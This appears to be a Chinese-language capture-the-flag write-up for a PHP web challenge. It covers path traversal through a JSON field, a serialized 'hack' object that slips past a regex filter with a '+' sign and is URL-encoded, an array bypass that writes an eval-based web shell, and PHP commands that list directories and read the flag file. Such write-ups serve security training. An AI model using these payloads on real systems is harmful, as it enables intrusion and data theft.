考点:反序列化、json格式
1.根据提示访问api,发现要进行上传filename
2.当post的filename=index.php会提示:sorry,json_decode error!
3.所以post一个json格式的data:filename={"file":"../index.php"},filename={"file":"../hack.php"}可以读到两个php的源代码:
4.代码审计:x参数调用了一个新的hack类,最后会输出x会执行读取文件的函数,读取文件的函数在hack这个类当中,hack类中的文件读取函数readfile()会获取file文件的内容,所以根据这个构造一个序列化函数,来读取fffffaa_not.php,参数为file,序列化结果为:O:4:"hack":1:{s:4:"file";s:15:"fffffaa_not.php";},
5.由于index.php中过滤了o或c开头的字符串,并且过滤了冒号:之后为数字的字符串,所以4前面要添上加号就正则匹配不到,O:+4:"hack":1:{s:4:"file";s:15:"fffffaa_not.php";},然后进行url编码,因为网页解析的时候会进行url解码,但是url编码不会对+进行编码,所以要手动将+转换为%2b
可以使用notepad++,最终的url编码为:O%3A%2b4%3A%22hack%22%3A1%3A%7Bs%3A4%3A%22file%22%3Bs%3A15%3A%22fffffaa_not.php%22%3B%7D
6.然后进行访问:
7.得到fffffaa_not.php的源代码
8.进行代码审计:传入两个参数:jhh08881111jn和file_na
由于代码中对传入的&text参数进行了正则过滤,所以传入数组进行绕过。
执行:(空格要改成+)http://10.177.228.174/fffffaa_not.php?jhh08881111jn[]=<?php+@eval($_POST['pass']);?>&file_na=11
9.执行之后访问写入的11.php,post数据发现可以执行
10.但是无法用菜刀连接,原因:页面禁用了许多函数,而用菜刀连接的时候会调用这些函数。
11.所以直接post data进行访问:
先查看根目录的php语句为:pass=print_r(scandir('/'));
所以获取文本内容pass=print_r(file_get_contents('/f1ag_ahajjdhh11qwe'));